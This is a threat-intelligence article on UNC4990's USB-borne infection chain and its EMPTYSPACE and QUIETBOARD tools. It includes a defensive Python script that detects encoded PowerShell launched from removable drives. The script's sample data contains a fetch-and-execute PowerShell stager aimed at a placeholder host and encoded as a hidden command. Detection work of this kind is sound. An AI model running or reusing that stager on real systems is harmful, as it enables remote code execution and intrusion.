UNC4990: A Threat Actor with a USB Trick up Its Sleeve
UNC4990 is a financially motivated threat actor tracked by Mandiant Managed Defense that stands out for relying on USB devices as its primary infection vector. Since at least 2020 it has targeted users, mainly in Italy.
UNC4990's playbook rests on the old tactic of weaponized USB drives, but the delivery chain behind it is not dated. The group has moved from hosting follow-on payloads as simple encoded text files to staging them on legitimate, high-reputation sites such as Ars Technica, GitHub, GitLab, and Vimeo, which makes the download traffic harder to tell apart from ordinary browsing.
The infection starts when a victim opens a malicious LNK shortcut on a removable USB drive. The shortcut is disguised with names built from common USB vendor names and storage sizes, so it looks like part of the drive rather than a foreign file. Opening it launches an encoded PowerShell script, which kicks off the rest of the chain.
The group uses two custom tools: EMPTYSPACE, a versatile downloader, and QUIETBOARD, a multifunctional backdoor. Together they let UNC4990 fetch and execute further payloads and keep persistent control of compromised hosts.
Mandiant's analysis shows a modular, incrementally developed toolset. QUIETBOARD started as a single module and has gained functionality over time, which points to an operator that adapts its tooling and is growing in sophistication.
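As an added illustration (not code from the Mandiant report or from UNC4990's own tooling), the following Python sketch shows how a detection engineer might triage process-creation telemetry for the pattern described above: powershell.exe spawned by Explorer from a non-system drive with an encoded command line. Field names follow the Sysmon Event ID 1 convention; the sample events are constructed for this example, the "non-system drive" test is a crude stand-in for proper removable-media correlation (an assumption, not a rule from the report), and example.invalid stands in for whatever host a real payload would be fetched from.

```python
"""Triage helper for the 'LNK on removable drive -> encoded PowerShell' pattern.

Added example code; not from Mandiant or UNC4990. The events below are
constructed to look like Sysmon Event ID 1 (process creation) records.
"""
import base64
import re

# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
NOPROFILE_RE = re.compile(r"-nop\b|-noprofile", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script from an -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze(event: dict):
    """Score one process-creation event; None if it is not a PowerShell launch."""
    if not event["Image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    cmd = event["CommandLine"]
    reasons = []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window")
    if NOPROFILE_RE.search(cmd):
        reasons.append("profile suppressed")
    # Assumption: a non-C: working directory approximates a removable drive.
    drive = event.get("CurrentDirectory", "")[:2].upper()
    if event["ParentImage"].lower().endswith("explorer.exe") and drive and drive != "C:":
        reasons.append(f"launched by Explorer from non-system drive {drive}")
    urls = URL_RE.findall(decoded) if decoded else []
    return {"score": len(reasons), "reasons": reasons, "decoded": decoded, "urls": urls}


def scan(events, threshold: int = 2):
    """Return analyses for events that meet the score threshold."""
    results = [analyze(e) for e in events]
    return [r for r in results if r and r["score"] >= threshold]


# Constructed stager text for the sample; example.invalid is a placeholder host.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage.txt')"

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {   # benign: admin runs a script from the system drive
        "ParentImage": r"C:\Windows\explorer.exe", "Image": PS_IMAGE,
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
        "CurrentDirectory": "C:\\scripts\\",
    },
    {   # suspicious: encoded, hidden, profile-less, Explorer launch from E: (LNK double-click)
        "ParentImage": r"C:\Windows\explorer.exe", "Image": PS_IMAGE,
        "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_ps(STAGER),
        "CurrentDirectory": "E:\\",
    },
    {   # encoded but from a service host on C:, so only one indicator
        "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS_IMAGE,
        "CommandLine": "powershell.exe -EncodedCommand " + encode_ps("Get-Date"),
        "CurrentDirectory": "C:\\Windows\\system32\\",
    },
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["score"], hit["reasons"], hit["urls"])
```

The decode step matters more than the match itself: an encoded command line tells you nothing until it is turned back into text, and the URLs pulled from the decoded script are what you would pivot on (here they would point at the legitimate hosting sites the group abuses). The drive-letter heuristic is deliberately simple; in production, correlate with device-arrival or volume-mount events instead of trusting the working directory.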
“It is unclear whether UNC4990 is responsible only for initial access and foothold. In at least one investigation, Mandiant has observed the deployment of a Coinminer following months of inactivity, leaving the end goal for UNC4990 operations open,” the researcher said.
UNC4990 shows how a technique that looks dated can stay effective. Its progression from a plain USB-borne attack to a multi-stage campaign that stages payloads on mainstream websites argues for treating removable media as a live attack surface: restrict or monitor USB use where the business allows it, watch for PowerShell spawned by Explorer with encoded command lines, and keep detection logic current as the group's tooling evolves.